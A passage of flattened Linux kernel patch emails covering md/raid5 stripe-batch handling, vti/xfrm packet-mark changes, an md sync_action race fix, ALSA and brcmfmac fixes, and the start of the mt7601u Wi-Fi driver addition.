handle_flags arg to break_stripe_batch_list. When we break a stripe_batch_list we sometimes want to set STRIPE_HANDLE on the individual stripes, and sometimes not. So pass a 'handle_flags' arg. If it is zero, always set STRIPE_HANDLE (on non-head stripes). If not zero, only set it if any of the given flags are present. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 6de2e1edd492..0b65eb51e562 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4235,7 +4235,8 @@ static int clear_batch_ready(struct stripe_head *sh) return 0; } -static void break_stripe_batch_list(struct stripe_head *head_sh) +static void break_stripe_batch_list(struct stripe_head *head_sh, + unsigned long handle_flags) { struct stripe_head *sh, *next; int i; @@ -4261,8 +4262,9 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) spin_lock_irq(&sh->stripe_lock); sh->batch_head = NULL; spin_unlock_irq(&sh->stripe_lock); - - set_bit(STRIPE_HANDLE, &sh->state); + if (handle_flags == 0 || + sh->state & handle_flags) + set_bit(STRIPE_HANDLE, &sh->state); release_stripe(sh); } spin_lock_irq(&head_sh->stripe_lock); @@ -4271,6 +4273,8 @@ static void break_stripe_batch_list(struct stripe_head *head_sh) for (i = 0; i < head_sh->disks; i++) if (test_and_clear_bit(R5_Overlap, &head_sh->dev[i].flags)) do_wakeup = 1; + if (head_sh->state & handle_flags) + set_bit(STRIPE_HANDLE, &head_sh->state); if (do_wakeup) wake_up(&head_sh->raid_conf->wait_for_overlap); @@ -4299,7 +4303,7 @@ static void handle_stripe(struct stripe_head *sh) } if (test_and_clear_bit(STRIPE_BATCH_ERR, &sh->state)) - break_stripe_batch_list(sh); + break_stripe_batch_list(sh, 0); if (test_bit(STRIPE_SYNC_REQUESTED, &sh->state) && !sh->batch_head) { spin_lock(&sh->stripe_lock); From 1b956f7a8f9aa63ea9644ab8c3374cf381993363 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 12:40:26 +1000 Subject: [PATCH 340/872] md/raid5: be more selective about distributing flags across batch. When a batch of stripes is broken up, we keep some of the flags that were per-stripe, and copy other flags from the head to all others. This only happens while a stripe is being handled, so many of the flags are irrelevant. The "SYNC_FLAGS" (which I've renamed to make it clear there are several) and STRIPE_DEGRADED are set per-stripe and so need to be preserved. STRIPE_INSYNC is the only flag that is set on the head that needs to be propagated to all others. For safety, add a WARN_ON if others are set, except: STRIPE_HANDLE - this is safe and per-stripe and we are going to set in several cases anyway STRIPE_INSYNC STRIPE_IO_STARTED - this is just a hint and doesn't hurt. STRIPE_ON_PLUG_LIST STRIPE_ON_RELEASE_LIST - It is a point pointless for a batched stripe to be on one of these lists, but it can happen as can be safely ignored. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 55 ++++++++++++++++++++++++++++++++++++---------- drivers/md/raid5.h | 2 +- 2 files changed, 45 insertions(+), 12 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 0b65eb51e562..1141b7f62e6e 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -3534,10 +3534,27 @@ static void handle_stripe_clean_event(struct r5conf *conf, struct stripe_head, batch_list); list_del_init(&sh->batch_list); - set_mask_bits(&sh->state, ~STRIPE_EXPAND_SYNC_FLAG, - head_sh->state & ~((1 << STRIPE_ACTIVE) | - (1 << STRIPE_PREREAD_ACTIVE) | - STRIPE_EXPAND_SYNC_FLAG)); + WARN_ON_ONCE(sh->state & ((1 << STRIPE_ACTIVE) | + (1 << STRIPE_SYNCING) | + (1 << STRIPE_REPLACED) | + (1 << STRIPE_PREREAD_ACTIVE) | + (1 << STRIPE_DELAYED) | + (1 << STRIPE_BIT_DELAY) | + (1 << STRIPE_FULL_WRITE) | + (1 << STRIPE_BIOFILL_RUN) | + (1 << STRIPE_COMPUTE_RUN) | + (1 << STRIPE_OPS_REQ_PENDING) | + (1 << STRIPE_DISCARD) | + (1 << STRIPE_BATCH_READY) | + (1 << STRIPE_BATCH_ERR) | + (1 << STRIPE_BITMAP_PENDING))); + WARN_ON_ONCE(head_sh->state & ((1 << STRIPE_DISCARD) | + (1 << STRIPE_REPLACED))); + + set_mask_bits(&sh->state, ~(STRIPE_EXPAND_SYNC_FLAGS | + (1 << STRIPE_DEGRADED)), + head_sh->state & (1 << STRIPE_INSYNC)); + sh->check_state = head_sh->check_state; sh->reconstruct_state = head_sh->reconstruct_state; for (i = 0; i < sh->disks; i++) { @@ -3549,7 +3566,7 @@ static void handle_stripe_clean_event(struct r5conf *conf, spin_lock_irq(&sh->stripe_lock); sh->batch_head = NULL; spin_unlock_irq(&sh->stripe_lock); - if (sh->state & STRIPE_EXPAND_SYNC_FLAG) + if (sh->state & STRIPE_EXPAND_SYNC_FLAGS) set_bit(STRIPE_HANDLE, &sh->state); release_stripe(sh); } @@ -3559,7 +3576,7 @@ static void handle_stripe_clean_event(struct r5conf *conf, spin_unlock_irq(&head_sh->stripe_lock); if (wakeup_nr) wake_up(&conf->wait_for_overlap); - if (head_sh->state & STRIPE_EXPAND_SYNC_FLAG) + if (head_sh->state & STRIPE_EXPAND_SYNC_FLAGS) set_bit(STRIPE_HANDLE, &head_sh->state); } @@ -4246,11 +4263,27 @@ static void break_stripe_batch_list(struct stripe_head *head_sh, list_del_init(&sh->batch_list); - set_mask_bits(&sh->state, ~STRIPE_EXPAND_SYNC_FLAG, - head_sh->state & ~((1 << STRIPE_ACTIVE) | - (1 << STRIPE_PREREAD_ACTIVE) | - (1 << STRIPE_DEGRADED) | - STRIPE_EXPAND_SYNC_FLAG)); + WARN_ON_ONCE(sh->state & ((1 << STRIPE_ACTIVE) | + (1 << STRIPE_SYNCING) | + (1 << STRIPE_REPLACED) | + (1 << STRIPE_PREREAD_ACTIVE) | + (1 << STRIPE_DELAYED) | + (1 << STRIPE_BIT_DELAY) | + (1 << STRIPE_FULL_WRITE) | + (1 << STRIPE_BIOFILL_RUN) | + (1 << STRIPE_COMPUTE_RUN) | + (1 << STRIPE_OPS_REQ_PENDING) | + (1 << STRIPE_DISCARD) | + (1 << STRIPE_BATCH_READY) | + (1 << STRIPE_BATCH_ERR) | + (1 << STRIPE_BITMAP_PENDING))); + WARN_ON_ONCE(head_sh->state & ((1 << STRIPE_DISCARD) | + (1 << STRIPE_REPLACED))); + + set_mask_bits(&sh->state, ~(STRIPE_EXPAND_SYNC_FLAGS | + (1 << STRIPE_DEGRADED)), + head_sh->state & (1 << STRIPE_INSYNC)); + sh->check_state = head_sh->check_state; sh->reconstruct_state = head_sh->reconstruct_state; for (i = 0; i < sh->disks; i++) { diff --git a/drivers/md/raid5.h b/drivers/md/raid5.h index 01cdb9f3a0c4..896d603ad0da 100644 --- a/drivers/md/raid5.h +++ b/drivers/md/raid5.h @@ -342,7 +342,7 @@ enum { */ }; -#define STRIPE_EXPAND_SYNC_FLAG \ +#define STRIPE_EXPAND_SYNC_FLAGS \ ((1 << STRIPE_EXPAND_SOURCE) |\ (1 << STRIPE_EXPAND_READY) |\ (1 << STRIPE_EXPANDING) |\ From 787b76fa37159050f6d26aebfa6210009baed93b Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 12:56:41 +1000 Subject: [PATCH 341/872] md/raid5: call break_stripe_batch_list from handle_stripe_clean_event Now that the code in break_stripe_batch_list() is nearly identical to the end of handle_stripe_clean_event, replace the later with a function call. The only remaining difference of any interest is the masking that is applieds to dev[i].flags copied from head_sh. R5_WriteError certainly isn't wanted as it is set per-stripe, not per-patch. R5_Overlap isn't wanted as it is explicitly handled. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 61 +++------------------------------------------- 1 file changed, 4 insertions(+), 57 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 1141b7f62e6e..3254504b1080 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -3420,6 +3420,8 @@ static void handle_stripe_fill(struct stripe_head *sh, set_bit(STRIPE_HANDLE, &sh->state); } +static void break_stripe_batch_list(struct stripe_head *head_sh, + unsigned long handle_flags); /* handle_stripe_clean_event * any written block on an uptodate or failed drive can be returned. * Note that if we 'wrote' to a failed drive, it will be UPTODATE, but @@ -3433,7 +3435,6 @@ static void handle_stripe_clean_event(struct r5conf *conf, int discard_pending = 0; struct stripe_head *head_sh = sh; bool do_endio = false; - int wakeup_nr = 0; for (i = disks; i--; ) if (sh->dev[i].written) { @@ -3522,62 +3523,8 @@ static void handle_stripe_clean_event(struct r5conf *conf, if (atomic_dec_and_test(&conf->pending_full_writes)) md_wakeup_thread(conf->mddev->thread); - if (!head_sh->batch_head || !do_endio) - return; - for (i = 0; i < head_sh->disks; i++) { - if (test_and_clear_bit(R5_Overlap, &head_sh->dev[i].flags)) - wakeup_nr++; - } - while (!list_empty(&head_sh->batch_list)) { - int i; - sh = list_first_entry(&head_sh->batch_list, - struct stripe_head, batch_list); - list_del_init(&sh->batch_list); - - WARN_ON_ONCE(sh->state & ((1 << STRIPE_ACTIVE) | - (1 << STRIPE_SYNCING) | - (1 << STRIPE_REPLACED) | - (1 << STRIPE_PREREAD_ACTIVE) | - (1 << STRIPE_DELAYED) | - (1 << STRIPE_BIT_DELAY) | - (1 << STRIPE_FULL_WRITE) | - (1 << STRIPE_BIOFILL_RUN) | - (1 << STRIPE_COMPUTE_RUN) | - (1 << STRIPE_OPS_REQ_PENDING) | - (1 << STRIPE_DISCARD) | - (1 << STRIPE_BATCH_READY) | - (1 << STRIPE_BATCH_ERR) | - (1 << STRIPE_BITMAP_PENDING))); - WARN_ON_ONCE(head_sh->state & ((1 << STRIPE_DISCARD) | - (1 << STRIPE_REPLACED))); - - set_mask_bits(&sh->state, ~(STRIPE_EXPAND_SYNC_FLAGS | - (1 << STRIPE_DEGRADED)), - head_sh->state & (1 << STRIPE_INSYNC)); - - sh->check_state = head_sh->check_state; - sh->reconstruct_state = head_sh->reconstruct_state; - for (i = 0; i < sh->disks; i++) { - if (test_and_clear_bit(R5_Overlap, &sh->dev[i].flags)) - wakeup_nr++; - sh->dev[i].flags = head_sh->dev[i].flags; - } - - spin_lock_irq(&sh->stripe_lock); - sh->batch_head = NULL; - spin_unlock_irq(&sh->stripe_lock); - if (sh->state & STRIPE_EXPAND_SYNC_FLAGS) - set_bit(STRIPE_HANDLE, &sh->state); - release_stripe(sh); - } - - spin_lock_irq(&head_sh->stripe_lock); - head_sh->batch_head = NULL; - spin_unlock_irq(&head_sh->stripe_lock); - if (wakeup_nr) - wake_up(&conf->wait_for_overlap); - if (head_sh->state & STRIPE_EXPAND_SYNC_FLAGS) - set_bit(STRIPE_HANDLE, &head_sh->state); + if (head_sh->batch_head && do_endio) + break_stripe_batch_list(head_sh, STRIPE_EXPAND_SYNC_FLAGS); } static void handle_stripe_dirtying(struct r5conf *conf, From 626f2092c85ac847bb80b3257eb6a565dec32278 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 22 May 2015 14:03:10 +1000 Subject: [PATCH 342/872] md/raid5: break stripe-batches when the array has failed. Once the array has too much failure, we need to break stripe-batches up so they can all be dealt with. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 3254504b1080..553d54b87052 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -4337,6 +4337,7 @@ static void handle_stripe(struct stripe_head *sh) if (s.failed > conf->max_degraded) { sh->check_state = 0; sh->reconstruct_state = 0; + break_stripe_batch_list(sh, 0); if (s.to_read+s.to_write+s.written) handle_failed_stripe(conf, sh, &s, disks, &s.return_bi); if (s.syncing + s.replacing) From cd5279c194f89c9b97c294af4aaf4ea8c5e3c704 Mon Sep 17 00:00:00 2001 From: Alexander Duyck Date: Wed, 27 May 2015 07:16:43 -0700 Subject: [PATCH 343/872] ip_vti/ip6_vti: Do not touch skb->mark on xmit Instead of modifying skb->mark we can simply modify the flowi_mark that is generated as a result of the xfrm_decode_session. By doing this we don't need to actually touch the skb->mark and it can be preserved as it passes out through the tunnel. Signed-off-by: Alexander Duyck Signed-off-by: Steffen Klassert --- net/ipv4/ip_vti.c | 5 +++-- net/ipv6/ip6_vti.c | 4 +++- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/net/ipv4/ip_vti.c b/net/ipv4/ip_vti.c index 9f7269f3c54a..4c318e1c13c8 100644 --- a/net/ipv4/ip_vti.c +++ b/net/ipv4/ip_vti.c @@ -216,8 +216,6 @@ static netdev_tx_t vti_tunnel_xmit(struct sk_buff *skb, struct net_device *dev) memset(&fl, 0, sizeof(fl)); - skb->mark = be32_to_cpu(tunnel->parms.o_key); - switch (skb->protocol) { case htons(ETH_P_IP): xfrm_decode_session(skb, &fl, AF_INET); @@ -233,6 +231,9 @@ static netdev_tx_t vti_tunnel_xmit(struct sk_buff *skb, struct net_device *dev) return NETDEV_TX_OK; } + /* override mark with tunnel output key */ + fl.flowi_mark = be32_to_cpu(tunnel->parms.o_key); + return vti_xmit(skb, dev, &fl); } diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c index ed9d681207fa..104de4da3ff3 100644 --- a/net/ipv6/ip6_vti.c +++ b/net/ipv6/ip6_vti.c @@ -495,7 +495,6 @@ vti6_tnl_xmit(struct sk_buff *skb, struct net_device *dev) int ret; memset(&fl, 0, sizeof(fl)); - skb->mark = be32_to_cpu(t->parms.o_key); switch (skb->protocol) { case htons(ETH_P_IPV6): @@ -516,6 +515,9 @@ vti6_tnl_xmit(struct sk_buff *skb, struct net_device *dev) goto tx_err; } + /* override mark with tunnel output key */ + fl.flowi_mark = be32_to_cpu(t->parms.o_key); + ret = vti6_xmit(skb, dev, &fl); if (ret < 0) goto tx_err; From 049f8e2e28d9c3dac0744cc2f19d3157c7fb5646 Mon Sep 17 00:00:00 2001 From: Alexander Duyck Date: Wed, 27 May 2015 07:16:49 -0700 Subject: [PATCH 344/872] xfrm: Override skb->mark with tunnel->parm.i_key in xfrm_input This change makes it so that if a tunnel is defined we just use the mark from the tunnel instead of the mark from the skb header. By doing this we can avoid the need to set skb->mark inside of the tunnel receive functions. Signed-off-by: Alexander Duyck Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_input.c | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c index 526c4feb3b50..b58286ecd156 100644 --- a/net/xfrm/xfrm_input.c +++ b/net/xfrm/xfrm_input.c @@ -13,6 +13,8 @@ #include #include #include +#include +#include static struct kmem_cache *secpath_cachep __read_mostly; @@ -186,6 +188,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) struct xfrm_state *x = NULL; xfrm_address_t *daddr; struct xfrm_mode *inner_mode; + u32 mark = skb->mark; unsigned int family; int decaps = 0; int async = 0; @@ -203,6 +206,18 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) XFRM_SPI_SKB_CB(skb)->daddroff); family = XFRM_SPI_SKB_CB(skb)->family; + /* if tunnel is present override skb->mark value with tunnel i_key */ + if (XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4) { + switch (family) { + case AF_INET: + mark = be32_to_cpu(XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4->parms.i_key); + break; + case AF_INET6: + mark = be32_to_cpu(XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6->parms.i_key); + break; + } + } + /* Allocate new secpath or COW existing one. */ if (!skb->sp || atomic_read(&skb->sp->refcnt) != 1) { struct sec_path *sp; @@ -229,7 +244,7 @@ int xfrm_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type) goto drop; } - x = xfrm_state_lookup(net, skb->mark, daddr, spi, nexthdr, family); + x = xfrm_state_lookup(net, mark, daddr, spi, nexthdr, family); if (x == NULL) { XFRM_INC_STATS(net, LINUX_MIB_XFRMINNOSTATES); xfrm_audit_state_notfound(skb, family, spi, seq); From d55c670cbc54b2270a465cdc382ce71adae45785 Mon Sep 17 00:00:00 2001 From: Alexander Duyck Date: Wed, 27 May 2015 07:16:54 -0700 Subject: [PATCH 345/872] ip_vti/ip6_vti: Preserve skb->mark after rcv_cb call The vti6_rcv_cb and vti_rcv_cb calls were leaving the skb->mark modified after completing the function. This resulted in the original skb->mark value being lost. Since we only need skb->mark to be set for xfrm_policy_check we can pull the assignment into the rcv_cb calls and then just restore the original mark after xfrm_policy_check has been completed. Signed-off-by: Alexander Duyck Signed-off-by: Steffen Klassert --- net/ipv4/ip_vti.c | 9 +++++++-- net/ipv6/ip6_vti.c | 9 +++++++-- 2 files changed, 14 insertions(+), 4 deletions(-) diff --git a/net/ipv4/ip_vti.c b/net/ipv4/ip_vti.c index 4c318e1c13c8..0c152087ca15 100644 --- a/net/ipv4/ip_vti.c +++ b/net/ipv4/ip_vti.c @@ -65,7 +65,6 @@ static int vti_input(struct sk_buff *skb, int nexthdr, __be32 spi, goto drop; XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = tunnel; - skb->mark = be32_to_cpu(tunnel->parms.i_key); return xfrm_input(skb, nexthdr, spi, encap_type); } @@ -91,6 +90,8 @@ static int vti_rcv_cb(struct sk_buff *skb, int err) struct pcpu_sw_netstats *tstats; struct xfrm_state *x; struct ip_tunnel *tunnel = XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4; + u32 orig_mark = skb->mark; + int ret; if (!tunnel) return 1; @@ -107,7 +108,11 @@ static int vti_rcv_cb(struct sk_buff *skb, int err) x = xfrm_input_state(skb); family = x->inner_mode->afinfo->family; - if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family)) + skb->mark = be32_to_cpu(tunnel->parms.i_key); + ret = xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family); + skb->mark = orig_mark; + + if (!ret) return -EPERM; skb_scrub_packet(skb, !net_eq(tunnel->net, dev_net(skb->dev))); diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c index 104de4da3ff3..ff3bd863fa03 100644 --- a/net/ipv6/ip6_vti.c +++ b/net/ipv6/ip6_vti.c @@ -322,7 +322,6 @@ static int vti6_rcv(struct sk_buff *skb) } XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = t; - skb->mark = be32_to_cpu(t->parms.i_key); rcu_read_unlock(); @@ -342,6 +341,8 @@ static int vti6_rcv_cb(struct sk_buff *skb, int err) struct pcpu_sw_netstats *tstats; struct xfrm_state *x; struct ip6_tnl *t = XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6; + u32 orig_mark = skb->mark; + int ret; if (!t) return 1; @@ -358,7 +359,11 @@ static int vti6_rcv_cb(struct sk_buff *skb, int err) x = xfrm_input_state(skb); family = x->inner_mode->afinfo->family; - if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family)) + skb->mark = be32_to_cpu(t->parms.i_key); + ret = xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family); + skb->mark = orig_mark; + + if (!ret) return -EPERM; skb_scrub_packet(skb, !net_eq(t->net, dev_net(skb->dev))); From 56ccc1125bc141cf63927eda7febff4216dea2d3 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 28 May 2015 17:53:29 +1000 Subject: [PATCH 346/872] md: fix race when unfreezing sync_action A recent change removed the need for locking around writing to "sync_action" (and various other places), but introduced a subtle race. When e.g. setting 'reshape' on a 'frozen' array, the 'frozen' flag is cleared before 'reshape' is set, so the md thread can get in and start trying recovery - which isn't wanted. So instead of clearing MD_RECOVERY_FROZEN for any command except 'frozen', only clear it when each specific command is parsed. This allows the handling of 'reshape' to clear the bit while a lock is held. Also remove some places where we set MD_RECOVERY_NEEDED, as it is always set on non-error exit of the function. Signed-off-by: NeilBrown Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") --- drivers/md/md.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/drivers/md/md.c b/drivers/md/md.c index d4f31e195e26..8f10f4ea70ea 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -4211,12 +4211,12 @@ action_store(struct mddev *mddev, const char *page, size_t len) if (!mddev->pers || !mddev->pers->sync_request) return -EINVAL; - if (cmd_match(page, "frozen")) - set_bit(MD_RECOVERY_FROZEN, &mddev->recovery); - else - clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); if (cmd_match(page, "idle") || cmd_match(page, "frozen")) { + if (cmd_match(page, "frozen")) + set_bit(MD_RECOVERY_FROZEN, &mddev->recovery); + else + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); flush_workqueue(md_misc_wq); if (mddev->sync_thread) { set_bit(MD_RECOVERY_INTR, &mddev->recovery); @@ -4229,16 +4229,17 @@ action_store(struct mddev *mddev, const char *page, size_t len) test_bit(MD_RECOVERY_NEEDED, &mddev->recovery)) return -EBUSY; else if (cmd_match(page, "resync")) - set_bit(MD_RECOVERY_NEEDED, &mddev->recovery); + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); else if (cmd_match(page, "recover")) { + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); set_bit(MD_RECOVERY_RECOVER, &mddev->recovery); - set_bit(MD_RECOVERY_NEEDED, &mddev->recovery); } else if (cmd_match(page, "reshape")) { int err; if (mddev->pers->start_reshape == NULL) return -EINVAL; err = mddev_lock(mddev); if (!err) { + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); err = mddev->pers->start_reshape(mddev); mddev_unlock(mddev); } @@ -4250,6 +4251,7 @@ action_store(struct mddev *mddev, const char *page, size_t len) set_bit(MD_RECOVERY_CHECK, &mddev->recovery); else if (!cmd_match(page, "repair")) return -EINVAL; + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); set_bit(MD_RECOVERY_REQUESTED, &mddev->recovery); set_bit(MD_RECOVERY_SYNC, &mddev->recovery); } From b40eda6408e94ee286cb5720cd3f409f70e01778 Mon Sep 17 00:00:00 2001 From: David Henningsson Date: Thu, 28 May 2015 09:40:23 +0200 Subject: [PATCH 347/872] ALSA: hda - Disable Headphone Mic boost for ALC662 When headphone mic boost is above zero, some 10 - 20 second delay might occur before the headphone mic is operational. Therefore disable the headphone mic boost control (recording gain is sufficient even without it). (Note: this patch is not about the headset mic, it's about the less common mic-in only mode.) BugLink: https://bugs.launchpad.net/bugs/1454235 Suggested-by: Kailang Yang Signed-off-by: David Henningsson Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index e3bf72bb278c..ea3af38eee58 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -4228,6 +4228,11 @@ static void alc_fixup_headset_mode_alc662(struct hda_codec *codec, if (action == HDA_FIXUP_ACT_PRE_PROBE) { spec->parse_flags |= HDA_PINCFG_HEADSET_MIC; spec->gen.hp_mic = 1; /* Mic-in is same pin as headphone */ + + /* Disable boost for mic-in permanently. (This code is only called + from quirks that guarantee that the headphone is at NID 0x1b.) */ + snd_hda_codec_write(codec, 0x1b, 0, AC_VERB_SET_AMP_GAIN_MUTE, 0x7000); + snd_hda_override_wcaps(codec, 0x1b, get_wcaps(codec, 0x1b) & ~AC_WCAP_IN_AMP); } else alc_fixup_headset_mode(codec, fix, action); } From 00e27eeb75bb91798225cfb1ab9f6b9e13d3d639 Mon Sep 17 00:00:00 2001 From: Arend van Spriel Date: Wed, 27 May 2015 19:31:41 +0200 Subject: [PATCH 348/872] brcmfmac: fix invalid access to struct acpi_device fields The fields of struct acpi_device are only known when CONFIG_ACPI is defined. Fix this by using a helper function. This will resolve the issue found in linux-next: ../brcmfmac/bcmsdh.c: In function 'brcmf_ops_sdio_probe': ../brcmfmac/bcmsdh.c:1139:7: error: dereferencing pointer to incomplete type adev->flags.power_manageable = 0; ^ Fixes: f0992ace680c ("brcmfmac: prohibit ACPI power management ...") Cc: Fu, Zhonghui Reported-by: Stephen Rothwell Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/bcmsdh.c | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c index b0d0ff5d82c0..71779b9e4bbe 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c @@ -1117,6 +1117,18 @@ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids); static struct brcmfmac_sdio_platform_data *brcmfmac_sdio_pdata; +static void brcmf_sdiod_acpi_set_power_manageable(struct device *dev, + int val) +{ +#if IS_ENABLED(CONFIG_ACPI) + struct acpi_device *adev; + + adev = ACPI_COMPANION(dev); + if (adev) + adev->flags.power_manageable = 0; +#endif +} + static int brcmf_ops_sdio_probe(struct sdio_func *func, const struct sdio_device_id *id) { @@ -1124,7 +1136,6 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, struct brcmf_sdio_dev *sdiodev; struct brcmf_bus *bus_if; struct device *dev; - struct acpi_device *adev; brcmf_dbg(SDIO, "Enter\n"); brcmf_dbg(SDIO, "Class=%x\n", func->class); @@ -1132,11 +1143,9 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device); brcmf_dbg(SDIO, "Function#: %d\n", func->num); - /* prohibit ACPI power management for this device */ dev = &func->dev; - adev = ACPI_COMPANION(dev); - if (adev) - adev->flags.power_manageable = 0; + /* prohibit ACPI power management for this device */ + brcmf_sdiod_acpi_set_power_manageable(dev, 0); /* Consume func num 1 but dont do anything with it. */ if (func->num == 1) From c869f77d6abb5d5f9f2f1a661d5c53862a9cad34 Mon Sep 17 00:00:00 2001 From: Jakub Kicinski Date: Tue, 26 May 2015 11:16:00 +0200 Subject: [PATCH 349/872] add mt7601u driver Add support for the simplest of MediaTek Wi-Fi devices - MT7601U. It is a single stream bgn chip with no bells or whistles. This driver is partially based on Felix's mt76 but IMHO it doesn't make sense to merge the two right now because MT7601U is a design somewhere between old Ralink devices and new Mediatek chips. There wouldn't be all that much code sharing with the devices mt76 supports. Situation may obviously change when someone decides to extend m76 with support for the more recent USB dongles. The driver supports only station mode. I'm hoping to add AP support when time allows. This driver sat on GitHub for quite a while and got some testing there: http://github.com/kuba-moo/mt7601u Signed-off-by: Jakub Kicinski Signed-off-by: Kalle Valo --- MAINTAINERS | 6 + drivers/net/wireless/Kconfig | 1 + drivers/net/wireless/Makefile | 2 + drivers/net/wireless/mediatek/Kconfig | 10 + drivers/net/wireless/mediatek/Makefile | 1 + drivers/net/wireless/mediatek/mt7601u/Kconfig | 6 + .../net/wireless/mediatek/mt7601u/Makefile | 9 + drivers/net/wireless/mediatek/mt7601u/core.c | 78 + .../net/wireless/mediatek/mt7601u/debugfs.c | 172 +++ drivers/net/wireless/mediatek/mt7601u/dma.c | 533 +++++++ drivers/net/wireless/mediatek/mt7601u/dma.h | 127 ++ .../net/wireless/mediatek/mt7601u/eeprom.c | 414 ++++++ .../net/wireless/mediatek/mt7601u/eeprom.h | 151 ++ drivers/net/wireless/mediatek/mt7601u/init.c | 625 ++++++++ .../net/wireless/mediatek/mt7601u/initvals.h | 164 +++ .../wireless/mediatek/mt7601u/initvals_phy.h | 291 ++++ drivers/net/wireless/mediatek/mt7601u/mac.c | 569 ++++++++ drivers/net/wireless/mediatek/mt7601u/mac.h | 178 +++ drivers/net/wireless/mediatek/mt7601u/main.c | 412 ++++++ drivers/net/wireless/mediatek/mt7601u/mcu.c | 534 +++++++ drivers/net/wireless/mediatek/mt7601u/mcu.h | 94 ++ .../net/wireless/mediatek/mt7601u/mt7601u.h | 390 +++++ drivers/net/wireless/mediatek/mt7601u/phy.c | 1251 +++++++++++++++++ drivers/net/wireless/mediatek/mt7601u/regs.h | 636 +++++++++ drivers/net/wireless/mediatek/mt7601u/trace.c | 21 + drivers/net/wireless/mediatek/mt7601u/trace.h | 400 ++++++ drivers/net/wireless/mediatek/mt7601u/tx.c | 319 +++++ drivers/net/wireless/mediatek/mt7601u/usb.c | 360 +++++ drivers/net/wireless/mediatek/mt7601u/usb.h | 77 + drivers/net/wireless/mediatek/mt7601u/util.c | 42 + drivers/net/wireless/mediatek/mt7601u/util.h | 77 + 31 files changed, 7950 insertions(+) create mode 100644 drivers/net/wireless/mediatek/Kconfig create mode 100644 drivers/net/wireless/mediatek/Makefile create mode 100644 drivers/net/wireless/mediatek/mt7601u/Kconfig create mode 100644 drivers/net/wireless/mediatek/mt7601u/Makefile create mode 100644 drivers/net/wireless/mediatek/mt7601u/core.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/debugfs.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/dma.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/dma.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/eeprom.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/eeprom.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/init.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/initvals.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/initvals_phy.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/mac.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/mac.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/main.c create mode 100644 